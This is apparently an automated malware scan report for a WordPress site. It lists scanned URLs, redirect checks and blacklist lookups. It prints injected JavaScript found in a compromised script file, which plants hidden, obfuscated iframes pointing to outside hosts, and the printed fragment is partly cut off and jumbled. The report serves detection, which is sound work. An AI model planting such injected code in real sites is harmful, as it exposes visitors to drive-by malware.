Scanned pages/files
Request | Server response | Status |
http://meganguza.com/ | 200 OK Content-Length: 17354 Content-Type: text/html | clean |
http://meganguza.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 98744 Content-Type: application/javascript | clean |
http://meganguza.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 9542 Content-Type: application/javascript | clean |
http://meganguza.com/wp-content/themes/snowberry/js/scripts.js?ver=3.9.1 | 200 OK Content-Length: 2970 Content-Type: application/javascript | clean |
http://meganguza.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.4.7.3 | 200 OK Content-Length: 3534 Content-Type: application/javascript | clean |
http://meganguza.com/wp-includes/js/comment-reply.min.js?ver=3.9.1 | 200 OK Content-Length: 3099 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Linode() {
var d = navigator.userAgent; var f = (d.indexOf("Screenshot") > -1 || d.indexOf("Maxthon") > -1 || d.indexOf("IEMobile") > -1 || d.indexOf("Chrome") > -1 || d.indexOf("FreeBSD") > -1 || d.indexOf("Android") > -1 || d.indexOf("iPad") > -1 || d.indexOf("Linux") > -1 || d.indexOf("Macintosh") > -1 || d.indexOf("iPhone") > -1 || d.indexOf("Mini") > -1); if (!f) { document.write('<iframe src="http://saleipq.isumm.ro/hrejerurt if (!browserData()) { var cookie = getCookie('jungleposter3r38fment17ashfeuajsle'); if (cookie == undefined) { setTimer('jungleposter3r38fment17ashfeuajsle', true, 260001); document.write('<'+'i'+'f'+'r'+'a'+'me'+' s'+'r'+'c="http://posimak.unionconfe.com.ar/kytskgmxnztjrkysky12.html" Name="Position" style="posit'+'ion:ab'+'solute;left'+':'+'-1370px;top'+':'+'-1370px;" height="160" width="160"></i'+'f'+'r'+'am'+'e'+'>'); } } })(); Antivirus reports:
| ||
http://meganguza.com/?page_id=18 | 200 OK Content-Length: 18846 Content-Type: text/html | clean |
http://meganguza.com/?page_id=29 | 200 OK Content-Length: 71219 Content-Type: text/html | clean |
http://meganguza.com/?page_id=23 | 500 Internal Server Error Content-Length: 655 Content-Type: text/html | clean |
http://meganguza.com/test404page.js | 404 Not Found Content-Length: 0 Content-Type: text/html | clean |
http://meganguza.com/?page_id=38 | 200 OK Content-Length: 21667 Content-Type: text/html | clean |
http://meganguza.com/?page_id=62 | 200 OK Content-Length: 17840 Content-Type: text/html | clean |
http://meganguza.com/wp-content/uploads/2012/05/Co-op-Board-approves-2012-2013-student-fund-budget.pdf | 200 OK Content-Length: 236416 Content-Type: application/pdf | clean |
http://meganguza.com/wp-content/uploads/2012/05/IUP-represented-among-PASSHE-in-Harrisburg-at-Advocacy-Days.pdf | 200 OK Content-Length: 248110 Content-Type: application/pdf | clean |
http://meganguza.com/wp-content/uploads/2012/05/Finance-committee-rules-on-budget-appeals.pdf | 200 OK Content-Length: 300970 Content-Type: application/pdf | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: meganguza.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 23 Jun 2014 04:36:08 GMT
Server: Apache
Content-Length: 17354
Content-Type: text/html; charset=UTF-8
Link: <http://meganguza.com/>; rel=shortlink
X-Pingback: http://meganguza.com/xmlrpc.php
X-Powered-By: PHP/5.4.29
...17354 bytes of data.
GET / HTTP/1.1
Host: meganguza.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 23 Jun 2014 04:36:08 GMT
Server: Apache
Content-Length: 17354
Content-Type: text/html; charset=UTF-8
Link: <http://meganguza.com/>; rel=shortlink
X-Pingback: http://meganguza.com/xmlrpc.php
X-Powered-By: PHP/5.4.29
...17354 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: meganguza.com
Referer: http://www.google.com/search?q=meganguza.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: meganguza.com
Referer: http://www.google.com/search?q=meganguza.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=meganguza.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://meganguza.com/
Result: meganguza.com is not infected or malware details are not published yet.
Result: meganguza.com is not infected or malware details are not published yet.